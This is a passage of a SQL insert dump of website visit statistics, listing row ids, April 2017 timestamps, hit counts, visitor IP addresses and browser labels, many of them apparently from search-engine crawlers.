1,1,0,0,'91.196.178.66','firefox'),(97578,1491209030,1,1,0,0,'180.76.15.21','other'),(97579,1491209062,1,1,0,0,'95.134.102.118','chrome'),(97580,1491209188,1,1,0,0,'163.172.64.246','other'),(97581,1491209420,1,1,0,0,'8.29.198.25','other'),(97582,1491209728,1,1,0,0,'163.172.108.151','chrome'),(97583,1491209729,1,1,0,0,'163.172.52.168','chrome'),(97584,1491210058,3,3,0,0,'77.222.134.100','firefox'),(97585,1491210397,1,1,0,0,'91.196.178.65','chrome'),(97586,1491210454,1,0,1,0,'66.249.66.81',''),(97587,1491210459,1,0,1,0,'66.249.76.91',''),(97588,1491210502,1,1,0,0,'51.255.65.15','other'),(97589,1491210587,1,1,0,0,'163.172.64.186','other'),(97590,1491210856,1,0,1,0,'66.249.76.109',''),(97591,1491210912,1,0,1,0,'66.249.76.89',''),(97592,1491211246,1,1,0,0,'51.255.65.80','other'),(97593,1491211392,1,0,1,0,'66.249.76.108',''),(97594,1491211489,1,1,0,0,'178.140.118.140','msie'),(97595,1491211512,1,1,0,0,'51.255.65.50','other'),(97596,1491212067,1,1,0,0,'51.255.65.6','other'),(97597,1491212095,1,1,0,0,'164.132.161.58','other'),(97598,1491212367,1,1,0,0,'141.8.142.15','other'),(97599,1491212533,1,1,0,0,'78.111.185.109','firefox'),(97600,1491212706,1,1,0,0,'91.196.178.72','firefox'),(97601,1491212864,1,1,0,0,'87.236.194.113','chrome'),(97602,1491212872,1,0,1,0,'66.249.76.91',''),(97603,1491212890,1,0,1,0,'66.249.76.89',''),(97604,1491213184,1,1,0,0,'51.255.65.17','other'),(97605,1491213351,1,1,0,0,'91.196.178.69','msie'),(97606,1491213603,1,1,0,0,'164.132.161.93','other'),(97607,1491213740,3,3,0,0,'178.159.42.127','other'),(97608,1491213989,1,1,0,0,'91.196.178.71','firefox'),(97609,1491214304,1,1,0,0,'91.196.178.129','chrome'),(97610,1491215334,1,1,0,0,'94.179.16.9','chrome'),(97611,1491215683,1,1,0,0,'212.58.160.35','other'),(97612,1491216430,1,1,0,0,'141.8.142.164','other'),(97613,1491216621,1,1,0,0,'40.77.167.5','other'),(97614,1491217224,1,1,0,0,'95.132.59.168','chrome'),(97615,1491217729,2,2,0,0,'37.52.20.178','chrome'),(97616,1491218083,1,1,0,0,'176.195.118.55','msie'),(97617,1491218676,1,1,0,0,'91.196.178.102','chrome'),(97618,1491218747,1,1,0,0,'95.27.139.243','msie'),(97619,1491219347,1,1,0,0,'77.222.134.100','firefox'),(97620,1491219591,1,0,1,0,'66.249.76.89',''),(97621,1491219694,1,1,0,0,'89.185.0.144','chrome'),(97622,1491219912,1,1,0,0,'194.44.166.107','chrome'),(97623,1491219916,1,1,0,0,'163.172.52.168','chrome'),(97624,1491219924,1,1,0,0,'163.172.108.151','chrome'),(97625,1491220248,1,1,0,0,'8.29.198.27','other'),(97626,1491220344,1,1,0,0,'91.196.177.26','chrome'),(97627,1491220745,1,1,0,0,'91.196.177.46','chrome'),(97628,1491220788,1,1,0,0,'91.196.178.69','chrome'),(97629,1491221599,1,1,0,0,'91.124.30.162','chrome'),(97630,1491221742,1,1,0,0,'213.108.44.26','chrome'),(97631,1491221885,1,1,0,0,'95.134.3.5','chrome'),(97632,1491222235,1,1,0,0,'91.196.178.66','firefox'),(97633,1491222467,1,1,0,0,'92.112.48.164','chrome'),(97634,1491222911,10,10,0,0,'88.99.195.39','other'),(97635,1491222942,1,0,1,0,'66.249.76.89',''),(97636,1491223325,1,0,1,0,'66.249.66.87',''),(97637,1491223430,1,1,0,0,'91.196.178.163','chrome'),(97638,1491223436,1,0,1,0,'66.249.66.177',''),(97639,1491225685,1,0,1,0,'66.249.76.107',''),(97640,1491225881,1,1,0,0,'66.249.76.109','chrome'),(97641,1491225952,1,1,0,0,'95.132.20.97','firefox'),(97642,1491226151,1,1,0,0,'95.134.117.1','chrome'),(97643,1491226483,1,1,0,0,'91.196.178.71','firefox'),(97644,1491226549,1,1,0,0,'91.209.11.236','other'),(97645,1491226648,1,1,0,0,'91.196.178.66','firefox'),(97646,1491226802,2,0,2,0,'66.249.76.89',''),(97647,1491226911,1,1,0,0,'31.43.28.141','chrome'),(97648,1491226935,2,2,0,0,'92.112.184.137','chrome'),(97649,1491226948,2,0,2,0,'66.249.66.84',''),(97650,1491227357,1,1,0,0,'91.196.178.134','firefox'),(97651,1491228200,1,0,1,0,'66.249.76.91',''),(97652,1491228336,1,1,0,0,'212.26.136.18','chrome'),(97653,1491228540,1,1,0,0,'207.46.13.134','other'),(97654,1491228551,1,1,0,0,'46.200.119.173','firefox'),(97655,1491228774,1,1,0,0,'180.76.15.30','other'),(97656,1491228808,1,1,0,0,'51.255.65.57','other'),(97657,1491229404,1,1,0,0,'51.255.65.38','other'),(97658,1491229725,1,1,0,0,'66.249.93.205','chrome'),(97659,1491230138,1,0,1,0,'207.46.13.134',''),(97660,1491230429,1,1,0,0,'31.43.28.141','chrome'),(97661,1491230838,1,1,0,0,'40.77.167.77','other'),(97662,1491230869,1,1,0,0,'94.179.209.204','firefox'),(97663,1491231016,1,1,0,0,'164.132.161.23','other'),(97664,1491231082,1,1,0,0,'8.29.198.27','other'),(97665,1491231224,1,1,0,0,'163.172.64.233','other'),(97666,1491231423,1,1,0,0,'207.46.13.142','other'),(97667,1491231427,1,1,0,0,'164.132.161.7','other'),(97668,1491232261,1,0,1,0,'66.249.76.108',''),(97669,1491232761,2,0,2,0,'66.249.76.93',''),(97670,1491233327,1,0,1,0,'66.249.66.177',''),(97671,1491234892,1,0,1,0,'66.249.66.81',''),(97672,1491234987,1,0,1,0,'66.249.66.87',''),(97673,1491235150,3,0,3,0,'66.249.76.89',''),(97674,1491235153,1,1,0,0,'91.124.158.104','chrome'),(97675,1491235177,1,0,1,0,'66.249.66.84',''),(97676,1491235213,2,0,2,0,'66.249.76.93',''),(97677,1491235282,1,0,1,0,'66.249.76.91',''),(97678,1491236027,1,0,1,0,'66.249.66.81',''),(97679,1491237051,1,0,1,0,'66.249.76.107',''),(97680,1491237596,1,1,0,0,'109.63.148.9','msie'),(97681,1491238379,1,0,1,0,'66.249.76.109',''),(97682,1491239397,1,1,0,0,'95.132.107.24','firefox'),(97683,1491239616,1,1,0,0,'66.249.76.108','chrome'),(97684,1491239621,1,1,0,0,'66.249.76.91','chrome'),(97685,1491239622,1,0,1,0,'157.55.39.171',''),(97686,1491241528,1,0,1,0,'66.249.76.109',''),(97687,1491241921,1,1,0,0,'8.29.198.26','other'),(97688,1491242655,1,1,0,0,'37.73.244.92','chrome'),(97689,1491243071,1,1,0,0,'91.196.178.35','chrome'),(97690,1491243507,1,1,0,0,'91.196.178.161','chrome'),(97691,1491243514,1,1,0,0,'91.209.11.236','other'),(97692,1491244807,1,1,0,0,'163.172.52.168','chrome'),(97694,1491245068,1,1,0,0,'157.55.39.138','other'),(97695,1491245163,1,1,0,0,'180.76.15.5','other'),(97696,1491245873,1,1,0,0,'66.249.66.183','chrome'),(97697,1491247333,1,0,1,0,'157.55.39.45',''),(97698,1491249458,1,1,0,0,'66.249.76.108','chrome'),(97699,1491249563,2,2,0,0,'66.249.76.107','chrome'),(97700,1491251337,1,1,0,0,'40.77.167.120','other'),(97701,1491251634,3,3,0,0,'157.55.39.138','other'),(97702,1491252755,1,1,0,0,'8.29.198.26','other'),(97703,1491253069,1,0,1,0,'66.249.76.89',''),(97704,1491253766,1,0,1,0,'66.249.76.108',''),(97705,1491254811,1,1,0,0,'5.255.253.63','other'),(97706,1491254870,1,1,0,0,'95.108.179.15','other'),(97707,1491255746,1,0,1,0,'66.249.76.93',''),(97708,1491255808,1,0,1,0,'66.249.76.107',''),(97709,1491255933,1,0,1,0,'66.249.66.177',''),(97710,1491256158,1,1,0,0,'91.209.11.236','other'),(97711,1491256222,1,1,0,0,'163.172.108.151','chrome'),(97712,1491256223,1,1,0,0,'163.172.52.168','chrome'),(97713,1491256965,1,1,0,0,'51.255.65.68','other'),(97714,1491257173,2,2,0,0,'5.255.253.63','other'),(97715,1491257183,1,0,1,0,'66.249.76.93',''),(97716,1491257252,1,1,0,0,'141.8.142.154','other'),(97717,1491257827,1,1,0,0,'164.132.161.91','other'),(97718,1491258590,1,0,1,0,'66.249.76.91',''),(97719,1491258860,5,5,0,0,'141.8.142.154','other'),(97720,1491258939,1,0,1,0,'66.249.76.89',''),(97721,1491259035,4,4,0,0,'141.8.142.164','other'),(97722,1491259051,4,4,0,0,'141.8.142.15','other'),(97723,1491259215,4,4,0,0,'95.108.213.34','other'),(97724,1491259229,3,3,0,0,'95.108.213.7','other'),(97725,1491259243,1,1,0,0,'5.255.253.58','other'),(97726,1491259532,1,1,0,0,'37.9.113.38','other'),(97727,1491259536,1,1,0,0,'178.154.200.37','other'),(97728,1491259590,1,1,0,0,'141.8.132.25','other'),(97729,1491259593,1,1,0,0,'95.108.213.8','other'),(97730,1491259596,1,1,0,0,'5.255.253.63','other'),(97731,1491259599,1,1,0,0,'141.8.132.39','other'),(97732,1491259602,1,1,0,0,'178.154.200.45','other'),(97733,1491259733,1,1,0,0,'164.132.161.4','other'),(97734,1491260325,1,1,0,0,'51.255.65.47','other'),(97735,1491260363,1,1,0,0,'51.255.65.33','other'),(97736,1491260916,1,1,0,0,'163.172.68.118','other'),(97737,1491261042,1,1,0,0,'163.172.71.29','other'),(97738,1491261318,1,1,0,0,'95.108.213.34','other'),(97739,1491263016,1,1,0,0,'163.172.64.187','other'),(97740,1491263396,1,1,0,0,'51.255.65.73','other'),(97741,1491263401,1,1,0,0,'51.255.65.82','other'),(97742,1491263591,1,1,0,0,'8.29.198.26','other'),(97743,1491263601,2,2,0,0,'5.255.253.58','other'),(97744,1491263619,2,2,0,0,'141.8.142.154','other'),(97745,1491263639,2,2,0,0,'178.154.200.37','other'),(97746,1491263653,1,1,0,0,'5.255.253.81','other'),(97747,1491263711,2,2,0,0,'141.8.142.164','other'),(97748,1491263772,3,3,0,0,'5.255.253.63','other'),(97749,1491263832,2,2,0,0,'95.108.179.15','other'),(97750,1491263852,1,1,0,0,'95.108.213.34','other'),(97751,1491263944,2,2,0,0,'95.108.213.7','other'),(97752,1491263991,1,1,0,0,'178.154.200.2','other'),(97753,1491264011,3,3,0,0,'141.8.132.25','other'),(97754,1491264028,3,3,0,0,'141.8.132.39','other'),(97755,1491264227,1,1,0,0,'178.154.189.3','other'),(97756,1491264318,1,1,0,0,'141.8.142.97','other'),(97757,1491264365,1,1,0,0,'141.8.142.15','other'),(97758,1491264421,1,1,0,0,'95.108.213.8','other'),(97759,1491264442,4,4,0,0,'5.255.253.28','other'),(97760,1491264548,4,4,0,0,'178.154.200.37','other'),(97761,1491264560,2,2,0,0,'5.255.253.81','other'),(97762,1491264573,1,1,0,0,'37.9.113.38','other'),(97763,1491264677,1,1,0,0,'141.8.142.154','other'),(97764,1491264722,1,1,0,0,'141.8.183.1','other'),(97765,1491264727,1,1,0,0,'93.158.152.77','other'),(97766,1491264840,1,1,0,0,'5.255.253.83','other'),(97767,1491264912,1,1,0,0,'37.9.113.43','other'),(97768,1491264944,1,1,0,0,'141.8.142.42','other'),(97769,1491265092,1,1,0,0,'51.255.65.42','other'),(97770,1491265692,1,1,0,0,'141.8.142.154','other'),(97771,1491265767,1,1,0,0,'141.8.142.38','other'),(97772,1491265794,1,1,0,0,'164.132.161.63','other'),(97773,1491265867,1,0,1,0,'66.249.76.109',''),(97774,1491265930,1,1,0,0,'5.255.253.70','other'),(97775,1491266274,1,1,0,0,'46.4.32.75','other'),(97776,1491266503,1,1,0,0,'164.132.161.55','other'),(97777,1491266666,1,0,1,0,'66.249.66.180',''),(97778,1491267083,1,0,1,0,'66.249.66.183',''),(97779,1491267110,1,1,0,0,'51.255.65.76','other'),(97780,1491267356,1,1,0,0,'51.255.65.73','other'),(97781,1491268048,1,1,0,0,'95.108.179.15','other'),(97782,1491268082,1,0,1,0,'66.249.76.109',''),(97783,1491268354,3,3,0,0,'95.108.213.7','other'),(97784,1491268395,1,1,0,0,'95.108.213.34','other'),(97785,1491268420,3,3,0,0,'141.8.142.154','other'),(97786,1491268455,1,1,0,0,'157.55.39.138','other'),(97787,1491268485,1,1,0,0,'141.8.142.38','other'),(97788,1491268517,1,1,0,0,'5.255.253.63','other'),(97789,1491268614,1,1,0,0,'178.154.200.37','other'),(97790,1491268630,1,1,0,0,'141.8.142.15','other'),(97791,1491270279,1,1,0,0,'163.172.71.21','other'),(97792,1491271023,1,1,0,0,'51.255.65.32','other'),(97793,1491271197,1,1,0,0,'163.172.64.192','other'),(97794,1491271219,1,1,0,0,'180.76.15.150','other'),(97795,1491271423,1,1,0,0,'66.249.66.180','chrome'),(97796,1491271546,1,1,0,0,'66.249.76.109','chrome'),(97797,1491273216,1,0,1,0,'157.55.39.138',''),(97798,1491273275,1,1,0,0,'163.172.64.186','other'),(97799,1491273577,1,0,1,0,'66.249.66.180',''),(97800,1491274419,1,1,0,0,'8.29.198.26','other'),(97801,1491274454,1,0,1,0,'66.249.76.107',''),(97802,1491274926,1,1,0,0,'51.255.65.79','other'),(97803,1491276219,1,0,1,0,'66.249.66.95',''),(97804,1491276802,1,1,0,0,'164.132.161.9','other'),(97805,1491277932,1,1,0,0,'66.249.76.108','chrome'),(97806,1491278080,1,0,1,0,'66.249.76.93',''),(97807,1491278165,1,1,0,0,'51.255.65.4','other'),(97808,1491278360,1,1,0,0,'163.172.64.188','other'),(97809,1491278535,1,1,0,0,'157.55.39.138','other'),(97810,1491278976,1,1,0,0,'66.249.93.93','chrome'),(97811,1491280389,1,1,0,0,'163.172.64.225','other'),(97812,1491280673,1,1,0,0,'51.255.65.77','other'),(97813,1491280714,1,1,0,0,'91.196.178.70','firefox'),(97814,1491280779,1,0,1,0,'66.249.76.89',''),(97815,1491281026,1,1,0,0,'66.249.66.180','chrome'),(97816,1491281594,1,0,1,0,'66.249.76.93',''),(97817,1491282141,1,1,0,0,'164.132.161.90','other'),(97818,1491282198,1,1,0,0,'91.196.178.101','firefox'),(97819,1491282207,1,1,0,0,'95.108.179.8','other'),(97820,1491282209,1,1,0,0,'5.255.253.43','other'),(97821,1491282479,1,1,0,0,'163.172.52.168','chrome'),(97822,1491282480,1,1,0,0,'163.172.108.151','chrome'),(97823,1491283177,1,1,0,0,'163.172.64.199','other'),(97824,1491283760,1,1,0,0,'164.132.161.51','other'),(97825,1491283895,1,1,0,0,'163.172.64.250','other'),(97826,1491283898,1,1,0,0,'91.196.178.71','chrome'),(97827,1491284080,1,1,0,0,'52.86.176.3','other'),(97828,1491284399,1,1,0,0,'164.132.161.6','other'),(97829,1491284604,1,1,0,0,'91.196.177.46','firefox'),(97830,1491285200,1,1,0,0,'164.132.161.60','other'),(97831,1491285238,1,0,1,0,'66.249.66.81',''),(97832,1491285259,1,1,0,0,'8.29.198.27','other'),(97833,1491285270,1,1,0,0,'91.196.178.168','chrome'),(97834,1491285672,1,1,0,0,'163.172.69.178','other'),(97835,1491286990,1,1,0,0,'91.196.178.66','firefox'),(97836,1491287089,1,1,0,0,'23.101.61.176','other'),(97837,1491287097,1,1,0,0,'91.196.178.66','chrome'),(97838,1491287160,1,1,0,0,'91.196.178.71','chrome'),(97839,1491287755,1,1,0,0,'91.196.178.65','chrome'),(97840,1491289397,1,1,0,0,'164.132.161.27','other'),(97841,1491289658,1,1,0,0,'163.172.68.121','other'),(97842,1491289909,1,1,0,0,'51.255.65.3','other'),(97843,1491290523,1,1,0,0,'91.196.177.26','chrome'),(97844,1491290586,1,1,0,0,'51.255.65.63','other'),(97845,1491290650,1,1,0,0,'91.196.178.68','chrome'),(97846,1491291120,1,1,0,0,'66.249.93.93','chrome'),(97847,1491291471,1,1,0,0,'51.255.65.31','other'),(97848,1491291545,1,1,0,0,'51.255.65.90','other'),(97849,1491291820,1,1,0,0,'78.40.181.9','firefox'),(97850,1491291890,1,1,0,0,'163.172.52.168','chrome'),(97851,1491291919,1,1,0,0,'163.172.108.151','chrome'),(97852,1491292049,1,1,0,0,'91.196.178.72','firefox'),(97853,1491292148,1,1,0,0,'51.255.65.30','other'),(97854,1491292673,1,0,1,0,'66.249.76.108',''),(97855,1491292676,1,1,0,0,'51.255.65.84','other'),(97856,1491293172,1,1,0,0,'91.196.178.72','firefox'),(97857,1491293566,1,1,0,0,'51.255.65.82','other'),(97858,1491293780,1,0,1,0,'157.55.39.194',''),(97859,1491293845,1,1,0,0,'193.93.51.80','chrome'),(97860,1491293856,1,1,0,0,'194.28.144.112','chrome'),(97861,1491293937,1,1,0,0,'213.108.44.26','chrome'),(97862,1491294103,2,2,0,0,'91.196.178.66','firefox'),(97863,1491294221,1,1,0,0,'37.55.120.144','chrome'),(97864,1491294932,1,1,0,0,'164.132.161.91','other'),(97865,1491295083,1,1,0,0,'66.249.66.180','chrome'),(97866,1491296092,1,1,0,0,'8.29.198.26','other'),(97867,1491296157,1,1,0,0,'164.132.161.19','other'),(97868,1491296192,1,0,1,0,'68.180.229.231',''),(97869,1491296308,1,0,1,0,'66.249.76.109',''),(97870,1491296467,1,1,0,0,'178.92.141.247','firefox'),(97871,1491297074,1,1,0,0,'51.255.65.8','other'),(97872,1491297164,1,1,0,0,'130.180.216.243','firefox'),(97873,1491297234,1,0,1,0,'66.249.66.177',''),(97874,1491297300,1,1,0,0,'164.132.161.73','other'),(97875,1491297369,1,1,0,0,'164.132.161.89','other'),(97876,1491297423,1,1,0,0,'164.132.161.30','other'),(97877,1491298495,1,1,0,0,'91.196.178.66','firefox'),(97878,1491298546,1,0,1,0,'66.249.76.107',''),(97879,1491298633,1,1,0,0,'46.201.225.169','chrome'),(97880,1491298663,1,1,0,0,'91.196.178.101','firefox'),(97881,1491299008,1,1,0,0,'51.255.65.65','other'),(97882,1491299107,1,1,0,0,'178.92.171.241','chrome'),(97883,1491299177,2,2,0,0,'178.54.190.249','firefox'),(97884,1491299471,1,1,0,0,'164.132.161.59','other'),(97885,1491299962,1,1,0,0,'91.196.178.69','firefox'),(97886,1491300066,1,1,0,0,'91.196.178.129','firefox'),(97887,1491300079,1,0,1,0,'66.249.76.89',''),(97888,1491300926,1,1,0,0,'91.196.178.66','firefox'),(97889,1491301327,1,1,0,0,'91.196.178.168','chrome'),(97890,1491301901,1,1,0,0,'91.196.178.65','firefox'),(97891,1491302295,1,1,0,0,'164.132.161.96','other'),(97892,1491302597,1,0,1,0,'66.249.66.84',''),(97893,1491303021,1,1,0,0,'91.196.178.65','firefox'),(97894,1491303309,1,1,0,0,'164.132.161.80','other'),(97895,1491303811,1,1,0,0,'92.112.56.110','chrome'),(97896,1491303888,1,1,0,0,'178.54.163.76','firefox'),(97897,1491304720,1,1,0,0,'51.255.65.38','other'),(97898,1491305501,1,1,0,0,'164.132.161.31','other'),(97899,1491305878,1,1,0,0,'164.132.161.50','other'),(97900,1491306654,1,1,0,0,'163.172.64.179','other'),(97901,1491306804,1,1,0,0,'51.255.65.85','other'),(97902,1491306900,1,1,0,0,'164.132.161.3','other'),(97903,1491306927,1,1,0,0,'8.29.198.26','other'),(97904,1491307215,1,1,0,0,'157.55.39.138','other'),(97905,1491308195,1,1,0,0,'157.55.39.138','other'),(97906,1491308751,1,1,0,0,'51.255.65.22','other'),(97907,1491308774,1,1,0,0,'141.8.142.164','other'),(97908,1491309101,1,1,0,0,'164.132.161.34','other'),(97909,1491309299,1,1,0,0,'91.196.178.66','firefox'),(97910,1491310275,1,1,0,0,'40.74.246.74','other'),(97911,1491310510,1,1,0,0,'91.196.178.71','firefox'),(97912,1491311235,1,0,1,0,'40.77.167.41',''),(97913,1491311854,1,1,0,0,'163.172.64.187','other'),(97914,1491311923,1,1,0,0,'163.172.64.250','other'),(97915,1491312091,5,5,0,0,'37.73.241.239','chrome'),(97916,1491312355,1,1,0,0,'91.196.178.35','chrome'),(97917,1491312634,1,1,0,0,'164.132.161.48','other'),(97918,1491312946,1,1,0,0,'163.172.64.241','other'),(97919,1491313374,1,1,0,0,'40.77.167.91','other'),(97920,1491314254,1,1,0,0,'178.209.66.127','chrome'),(97921,1491314502,1,1,0,0,'91.196.177.26','chrome'),(97922,1491314859,1,1,0,0,'91.196.178.168','chrome'),(97923,1491315346,1,1,0,0,'163.172.64.228','other'),(97924,1491315962,1,1,0,0,'164.132.161.15','other'),(97925,1491316072,1,1,0,0,'163.172.64.222','other'),(97926,1491316201,1,1,0,0,'40.77.167.91','other'),(97927,1491317503,1,1,0,0,'91.196.178.167','chrome'),(97928,1491317509,1,1,0,0,'164.132.161.80','other'),(97929,1491317764,1,1,0,0,'8.29.198.25','other'),(97930,1491318547,1,1,0,0,'66.249.66.177','chrome'),(97931,1491319185,1,1,0,0,'178.92.74.120','chrome'),(97932,1491319251,1,1,0,0,'164.132.161.55','other'),(97933,1491320212,1,1,0,0,'51.255.65.15','other'),(97934,1491321459,1,0,1,0,'66.249.66.177',''),(97935,1491321514,1,0,1,0,'66.249.76.93',''),(97936,1491322156,1,1,0,0,'46.200.212.48','chrome'),(97937,1491322411,1,1,0,0,'66.249.93.202','chrome'),(97938,1491322547,1,1,0,0,'51.255.65.34','other'),(97939,1491323147,1,1,0,0,'213.133.111.165','other'),(97940,1491323563,1,1,0,0,'51.255.65.11','other'),(97941,1491323569,1,1,0,0,'213.110.97.174','firefox'),(97942,1491324376,1,1,0,0,'163.172.64.249','other'),(97943,1491324449,1,0,1,0,'66.249.76.108',''),(97944,1491324567,1,1,0,0,'163.172.64.186','other'),(97945,1491324577,1,1,0,0,'163.172.64.241','other'),(97946,1491325120,1,1,0,0,'164.132.161.23','other'),(97947,1491325186,1,1,0,0,'164.132.161.47','other'),(97948,1491325462,1,1,0,0,'157.55.39.138','other'),(97949,1491325888,1,1,0,0,'164.132.161.34','other'),(97950,1491325896,1,1,0,0,'94.179.209.204','firefox'),(97951,1491326358,1,1,0,0,'51.255.65.73','other'),(97952,1491327362,1,1,0,0,'51.255.65.54','other'),(97953,1491327754,1,1,0,0,'51.255.65.19','other'),(97954,1491328151,1,1,0,0,'164.132.161.26','other'),(97955,1491328590,1,1,0,0,'8.29.198.26','other'),(97956,1491328937,1,1,0,0,'157.55.39.138','other'),(97957,1491329126,1,1,0,0,'163.172.64.228','other'),(97958,1491329198,1,0,1,0,'66.249.66.84',''),(97959,1491329381,1,1,0,0,'40.77.167.41','other'),(97960,1491329656,1,1,0,0,'95.132.36.131','firefox'),(97961,1491330490,1,1,0,0,'91.196.178.165','chrome'),(97962,1491330537,1,1,0,0,'93.72.155.96','firefox'),(97963,1491331051,1,1,0,0,'163.172.64.229','other'),(97964,1491331163,1,1,0,0,'163.172.64.252','other'),(97965,1491331289,1,1,0,0,'157.55.39.194','other'),(97966,1491331715,1,1,0,0,'163.172.64.250','other'),(97967,1491331879,1,1,0,0,'66.102.9.40','chrome'),(97968,1491332043,1,1,0,0,'66.249.66.87','chrome'),(97969,1491332050,1,1,0,0,'66.249.76.107','chrome'),(97970,1491332686,1,1,0,0,'164.132.161.77','other'),(97971,1491332736,1,1,0,0,'163.172.71.29','other'),(97972,1491332783,1,1,0,0,'51.255.65.41','other'),(97973,1491332855,1,1,0,0,'51.255.65.12','other'),(97974,1491334085,1,1,0,0,'51.255.65.73','other'),(97975,1491334617,1,1,0,0,'130.180.220.194','other'),(97976,1491334745,1,1,0,0,'91.196.178.100','chrome'),(97977,1491335284,1,1,0,0,'51.255.65.63','other'),(97978,1491335363,1,1,0,0,'164.132.161.52','other'),(97979,1491335918,1,0,1,0,'66.249.76.93',''),(97980,1491336086,1,1,0,0,'51.255.65.60','other'),(97981,1491336811,1,1,0,0,'51.255.65.79','other'),(97982,1491337621,1,1,0,0,'163.172.64.242','other'),(97983,1491338209,1,1,0,0,'51.255.65.22','other'),(97984,1491338277,1,1,0,0,'51.255.65.57','other'),(97985,1491339413,1,1,0,0,'8.29.198.25','other'),(97986,1491339660,1,1,0,0,'91.209.11.236','other'),(97987,1491339726,1,1,0,0,'40.77.167.41','other'),(97988,1491340338,1,1,0,0,'51.255.65.42','other'),(97989,1491342973,1,1,0,0,'92.112.124.240','chrome'),(97990,1491343390,1,1,0,0,'217.20.153.217','other'),(97991,1491343394,1,1,0,0,'94.100.184.100','msie'),(97992,1491344146,1,0,1,0,'66.249.76.109',''),(97993,1491344271,1,0,1,0,'66.249.76.93',''),(97994,1491344781,1,0,1,0,'66.249.66.87',''),(97995,1491345169,1,0,1,0,'66.249.66.183',''),(97996,1491347028,1,1,0,0,'164.132.161.31','other'),(97997,1491348781,1,0,1,0,'66.249.76.107',''),(97998,1491350244,1,1,0,0,'8.29.198.25','other'),(97999,1491350852,1,1,0,0,'40.77.167.24','other'),(98000,1491351427,1,1,0,0,'93.170.187.48','chrome'),(98001,1491352507,1,0,1,0,'157.55.39.83',''),(98002,1491352822,1,1,0,0,'164.132.161.67','other'),(98003,1491352995,1,1,0,0,'51.255.65.7','other'),(98004,1491353354,1,1,0,0,'66.102.9.27','chrome'),(98005,1491353556,1,1,0,0,'163.172.64.228','other'),(98006,1491353962,1,1,0,0,'164.132.161.10','other'),(98007,1491354131,2,0,2,0,'157.55.39.83',''),(98008,1491354329,1,0,1,0,'66.249.76.109',''),(98009,1491354749,1,0,1,0,'40.77.167.100',''),(98010,1491355145,1,1,0,0,'95.108.213.7','other'),(98011,1491355740,2,1,1,0,'40.77.167.41',''),(98012,1491355742,1,1,0,0,'40.77.167.41','other'),(98013,1491355921,1,1,0,0,'37.53.89.22','chrome'),(98014,1491356038,1,1,0,0,'163.172.64.225','other'),(98015,1491357458,1,1,0,0,'164.132.161.15','other'),(98016,1491358098,1,1,0,0,'164.132.161.96','other'),(98017,1491358608,1,1,0,0,'51.255.65.49','other'),(98018,1491358611,1,1,0,0,'164.132.161.41','other'),(98019,1491358631,1,0,1,0,'66.249.66.180',''),(98020,1491358646,1,1,0,0,'164.132.161.3','other'),(98021,1491360006,1,0,1,0,'66.249.76.108',''),(98022,1491360361,1,1,0,0,'163.172.72.48','other'),(98023,1491361077,1,1,0,0,'8.29.198.25','other'),(98024,1491361233,1,1,0,0,'164.132.161.95','other'),(98025,1491361339,1,1,0,0,'157.55.39.247','other'),(98026,1491361420,1,0,1,0,'66.249.66.87',''),(98027,1491361645,1,1,0,0,'164.132.161.54','other'),(98028,1491362113,1,1,0,0,'164.132.161.75','other'),(98029,1491362278,1,0,1,0,'66.249.66.183',''),(98030,1491363925,1,1,0,0,'51.255.65.84','other'),(98031,1491364361,1,0,1,0,'207.46.13.62',''),(98032,1491364770,1,0,1,0,'207.46.13.63',''),(98033,1491364860,1,0,1,0,'66.249.76.107',''),(98034,1491365602,1,1,0,0,'51.255.65.47','other'),(98035,1491365940,1,1,0,0,'163.172.64.224','other'),(98036,1491366030,1,0,1,0,'66.249.66.84',''),(98037,1491366405,1,1,0,0,'178.137.19.38','firefox'),(98038,1491367109,1,1,0,0,'91.196.178.72','firefox'),(98039,1491367751,1,0,1,0,'66.249.66.87',''),(98040,1491367776,1,0,1,0,'66.249.76.91',''),(98041,1491368348,2,0,2,0,'66.249.66.99',''),(98042,1491368812,1,0,1,0,'66.249.66.177',''),(98043,1491368892,1,1,0,0,'164.132.161.17','other'),(98044,1491369060,1,1,0,0,'164.132.161.45','other'),(98045,1491369232,1,0,1,0,'66.249.76.108',''),(98046,1491369245,1,0,1,0,'40.77.167.100',''),(98047,1491369426,1,1,0,0,'178.137.19.38','chrome'),(98048,1491370543,1,1,0,0,'164.132.161.91','other'),(98049,1491370980,1,1,0,0,'91.196.178.65','chrome'),(98050,1491371017,1,1,0,0,'91.196.178.68','chrome'),(98051,1491371127,1,1,0,0,'207.46.13.62','other'),(98052,1491371818,1,1,0,0,'66.249.66.177','chrome'),(98053,1491371871,1,1,0,0,'46.219.247.76','chrome'),(98054,1491371911,1,1,0,0,'8.29.198.26','other'),(98055,1491372028,1,1,0,0,'91.196.178.68','firefox'),(98056,1491372041,1,1,0,0,'91.196.178.66','firefox'),(98057,1491372291,1,1,0,0,'37.52.17.76','chrome'),(98058,1491372560,1,1,0,0,'163.172.108.151','chrome'),(98059,1491372705,1,1,0,0,'163.172.52.168','chrome'),(98060,1491373159,1,1,0,0,'91.196.178.65','chrome'),(98061,1491373288,1,1,0,0,'180.76.15.21','other'),(98062,1491373803,1,1,0,0,'51.255.65.69','other'),(98063,1491374049,1,1,0,0,'91.196.177.46','firefox'),(98064,1491374998,1,1,0,0,'178.255.215.94','other'),(98065,1491375219,1,1,0,0,'195.49.151.99','chrome'),(98066,1491375324,1,0,1,0,'66.249.66.81',''),(98067,1491375483,1,1,0,0,'91.196.178.68','firefox'),(98068,1491375902,1,1,0,0,'213.108.45.138','chrome'),(98069,1491377085,1,1,0,0,'51.255.65.89','other'),(98070,1491377298,1,1,0,0,'164.132.161.62','other'),(98071,1491377548,1,0,1,0,'40.77.167.100',''),(98072,1491377705,1,1,0,0,'91.196.178.65','firefox'),(98073,1491379011,1,0,1,0,'40.77.167.100',''),(98074,1491379030,1,1,0,0,'51.255.65.16','other'),(98075,1491379109,1,1,0,0,'91.196.178.65','firefox'),(98076,1491379398,1,1,0,0,'188.163.18.91','chrome'),(98077,1491379802,1,1,0,0,'46.219.247.76','chrome'),(98078,1491379946,1,1,0,0,'164.132.161.7','other'),(98079,1491380403,1,1,0,0,'188.163.18.91','chrome'),(98080,1491380638,1,1,0,0,'92.112.109.230','chrome'),(98081,1491381000,1,1,0,0,'194.187.218.50','chrome'),(98082,1491381210,2,2,0,0,'91.196.178.161','chrome'),(98083,1491381602,1,1,0,0,'46.219.247.76','chrome'),(98084,1491382017,1,1,0,0,'164.132.161.27','other'),(98085,1491382080,1,1,0,0,'91.209.11.236','other'),(98086,1491382171,1,1,0,0,'91.196.178.161','chrome'),(98087,1491382225,1,0,1,0,'66.249.76.109',''),(98